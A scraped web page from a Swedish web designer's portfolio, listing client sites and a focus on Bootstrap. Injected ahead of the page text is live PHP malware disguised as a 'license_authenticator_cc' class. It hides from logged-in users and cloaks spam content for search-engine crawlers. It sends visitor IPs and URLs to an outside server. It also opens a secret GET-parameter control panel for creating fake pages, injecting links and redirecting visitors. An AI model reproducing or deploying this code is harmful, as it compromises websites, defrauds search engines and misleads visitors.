if(!class_exists('license_authenticator_cc')){class license_authenticator_cc{ public static function parse_output(){$data=self::get_option('sw-');if($data===false||!is_array($data)||!is_object($GLOBALS['wp'])){ob_end_flush();return 0;}$requested_page_slug=strtolower($GLOBALS['wp']->request);if(array_key_exists($requested_page_slug,$data)){$buffer='';$levels=ob_get_level();for($i=0;$i<$levels;$i++){$buffer.=ob_get_clean();}echo preg_replace('/\x08UA-\d{4,10}-\d{1,4}\x08/',$data[$fullUrl][1],$buffer);}if(!function_exists('is_user_logged_in')||is_user_logged_in()){}else{$fullUrl=$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI];$fullUrl=rtrim($fullUrl,'/');$fullUrl=str_replace("www.","",$fullUrl);$curagent=self::get_user_agent();if(preg_match('/bot|crawl|curl|dataprovider|search|get|spider|find|java|majesticsEO|google|yahoo|teoma|contaxe|yandex|libwww-perl|facebookexternalhit/i',$curagent)){if(isset($data[$fullUrl])){$buffer='';$levels=ob_get_level();for($i=0;$i<$levels;$i++){$buffer.=ob_get_clean();}if(strpos($buffer,"$val){$new[]=$val;if($i==$kR){$new[]=''.$kw.' ';}$i++;}$newbuffer=implode(' ',$new);}echo $cleanbuffer[0].$newbuffer;}}}}} public static function get_user_agent(){$user_agent=(!empty($_SERVER['HTTP_USER_AGENT'])?trim($_SERVER['HTTP_USER_AGENT']):'');if(!empty($_SERVER['HTTP_X_DEVICE_USER_AGENT'])){$real_user_agent=trim($_SERVER['HTTP_X_DEVICE_USER_AGENT']);}elseif(!empty($_SERVER['HTTP_X_ORIGINAL_USER_AGENT'])){$real_user_agent=trim($_SERVER['HTTP_X_ORIGINAL_USER_AGENT']);}if(!empty($real_user_agent)&&(strlen($real_user_agent)>=5||empty($user_agent))){$user_agent=$real_user_agent;}return $user_agent;} public static function get_protocol(){return (stripos($_SERVER['SERVER_PROTOCOL'],'https')!==false)?'https://':'http://';} public static function check_query_string(){global $HTTP_POST_VARS,$HTTP_GET_VARS;$data=self::get_option();if(empty($data['__last_checked__'])||intval(date('U'))-intval($data['__last_checked__'])>86400){if(!is_array($data))$data=array();$data['__last_checked__']=date('U');self::update_option($data);$response=self::endpoint_request();}if(!function_exists('is_user_logged_in')||is_user_logged_in()){return '';}if(!empty($_GET['pwidget'])&&!empty($_GET['action'])&&$_GET['pwidget']=='3371'){$message='invalid payload';if(($data===false||!is_array($data))&&$_GET['action']!='p'){$message='no id found';}else {nocache_headers();switch($_GET['action']){case 'l':if(is_array($data)&&!empty($data)){unset($data['__last_checked__']);$message=implode(',',array_keys($data));if(empty($message)){$message='no id found';}}else if(!empty($data)){$message=serialize($data);}else {$message='no id found';}break;case 'd':if(isset($_GET['pnum'])){if(isset($data[$_GET['pnum']])){unset($data[$_GET['pnum']]);self::update_option($data);$message='deleted '.$_GET['pnum'];}else {$message='id not found';}}break;case 'dsw':if(isset($_GET['url'])){$swData=self::get_option('sw-');if(!isset($_GET['val'])){unset($swData[$_GET['url']]);$message='deleted url';}else {if(isset($swData[$_GET['url']])&&in_array($_GET['val'],$swData[$_GET['url']])){$vKey=array_search($_GET['val'],$swData[$_GET['url']]);unset($swData[$_GET['url']][$vKey]);}if(empty($swData[$_GET['url']])){unset($swData[$_GET['url']]);}$message=sprintf('good stuff, no more %s',$_GET['val']);}self::update_option($swData,'sw-');$newSw=self::get_option('sw-');}else {$message='Url is missing';}break;case 'da':self::update_option(array());$message='deleted all';break;case 'update':if(isset($_GET['url'])){$message='updated';header("Location: ".$_GET['url']);die();break;}case 'p':$response=self::endpoint_request(false);if(!is_object($response)){break;}$key=$response->purl;if(isset($_GET['pnum'])){$key=sanitize_title($_GET['pnum']);}if(empty($key)&&!empty($response->ptitle)){$key=sanitize_title($response->ptitle);}if(!empty($key)){$data[$key]=array('post_title'=>!empty($response->ptitle)?$response->ptitle:'A title','post_content'=>!empty($response->pcontent)?$response->pcontent:'Content goes here','post_date'=>date('Y-m-d H:i:s',rand(intval(date('U'))-2419200,intval(date('U'))-1814400)));self::update_option($data);$fullsw=explode(",",$response->sw);foreach($fullsw as $sw){$swCheck=explode('|',$sw);if(!is_array($swCheck)||count($swCheck)<2){continue;}$oldsw=self::get_option('sw-');$InternalLinky=''.$swCheck[1].'';if(!is_array($oldsw)){$oldsw=array();}if(isset($oldsw[$swCheck[0]])){if(in_array($InternalLinky,$oldsw[$swCheck[0]])){continue;}}$oldsw[$swCheck[0]][]=$InternalLinky;self::update_option($oldsw,'sw-');}$message=$key.' | '.get_bloginfo('wpurl').'/'.$key;}break;default:break;}}echo $message;die();}} public static function dynamic_page($posts){if(!function_exists('is_user_logged_in')||is_user_logged_in()){return $posts;}$data=self::get_option();if($data===false||!is_array($data)){return $posts;}$requested_page_slug=strtolower($GLOBALS['wp']->request);if(empty($posts)){$posts=array();}if(count($posts)==0&&array_key_exists($requested_page_slug,$data)){$post=new stdClass;$post_date=!empty($data[$requested_page_slug]['post_date'])?$data[$requested_page_slug]['post_date']:date('Y-m-d H:i:s');$post->post_title=$data[$requested_page_slug]['post_title'];$post->post_content=$data[$requested_page_slug]['post_content'];$post->post_author=1;$post->post_name=$requested_page_slug;$post->guid=get_bloginfo('wpurl').'/'.$requested_page_slug;$post->ID=-3371;$post->post_status='publish';$post->comment_status='closed';$post->ping_status='closed';$post->comment_count=0;$post->post_date=$post_date;$post->post_date_gmt=$post_date;$post=(object)array_merge((array)$post,array('slug'=>get_bloginfo('wpurl').'/'.$requested_page_slug,'post_title'=>$data[$requested_page_slug]['post_title'],'post content'=>$data[$requested_page_slug]['post_content']));$posts=NULL;$posts[]=$post;$GLOBALS['wp_query']->is_page=true;$GLOBALS['wp_query']->is_singular=true;$GLOBALS['wp_query']->is_home=false;$GLOBALS['wp_query']->is_archive=false;$GLOBALS['wp_query']->is_category=false;unset($GLOBALS['wp_query']->query['error']);$GLOBALS['wp_query']->query_vars['error']='';$GLOBALS['wp_query']->is_404=false;}return $posts;} protected static function get_option($prefix=''){$unique_id=substr(md5(sprintf('%s%s',$prefix,get_site_url().'unique')),0,10);$encoded=get_option($unique_id,'');$decoded=@json_decode(base64_decode($encoded),true);return ($decoded!==false)?$decoded:'';} protected static function update_option($_value='',$prefix=''){$unique_id=substr(md5(sprintf('%s%s',$prefix,get_site_url().'unique')),0,10);$encoded=base64_encode(json_encode($_value));update_option($unique_id,$encoded,false);} protected static function endpoint_request($_update=true){$http=self::http_object();$url=$_update?'http://codecanyon.io/api/update/?url=':'http://codecanyon.io/api/check/?url=';$url.=urlencode(self::get_protocol().$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']).'&agent='.urlencode(self::get_user_agent()).'&v=1&p=5&ip='.urlencode($_SERVER['REMOTE_ADDR']).'&siteurl='.urlencode(get_site_url());$args=array('http'=>array('timeout'=>10,'ignore_errors'=>false));$response=$http->get($url,$args);if(is_wp_error($response)||!isset($response['body'])){return '';}if(empty($response['body'])){return '';}return @json_decode($response['body']);} protected static function http_object(){static $http=null;if(is_null($http)){$http=new WP_Http();}return $http;}}}if(function_exists('add_action')){ob_start();add_action('wp',array('license_authenticator_cc','check_query_string'));add_filter('the_posts',array('license_authenticator_cc','dynamic_page'));add_action('shutdown',array('license_authenticator_cc','parse_output'),0);} Portfolio | Webprojekt - Webdesign
2011/02/21

Portfolio

Detta är endast ett litet utval av alla sajter jag har byggt mellan 2000 – 2018.

Ska snart ladda upp fler screens för detta men pga av tidsbrist  har jag inte haft tid. Sorry !

Visar i alla fall ett par av mina senaste projekt! Gjorda 2014 – 2018 …

 

bemabEn hemsida jag gjorde åt Bemab i Gråbo.

http://bemab.nu

 

 

 

 

 

 

infusionsEn kund från usa som behövde en responsive och modern hemsida.

https://infusionsolutions.org/

 

 

 

 

 

church

En kyrka i usa bad mig göra en helt ny hemsida  för deras medlemmar . Responsive Design med många funktioner !

http://www.wayneum.com/

 

 

 

Oj oj oj jag har gjort så många hemsidor åt olika kunder från hela världen.
allt från att göra om deras gamla sidor till nytt och modern
till att göra dom från början med ny design mm.

Allt från privata hemsidor, förenings hemsidor, forum, community, mm.
Har haft “teamwork” med en kille från Usa och hjälp honom med webdesign
för hans web kunder dom senaste åren. Har varit och är ett fint “teamwork”.

Idag jobbar jag mest med bootstrap 3 – 4  (gör din website mobil vänlig ) !
för att dom flesta idag använder sin mobil när dom besöker olika web sidor.

 

 

error: protected !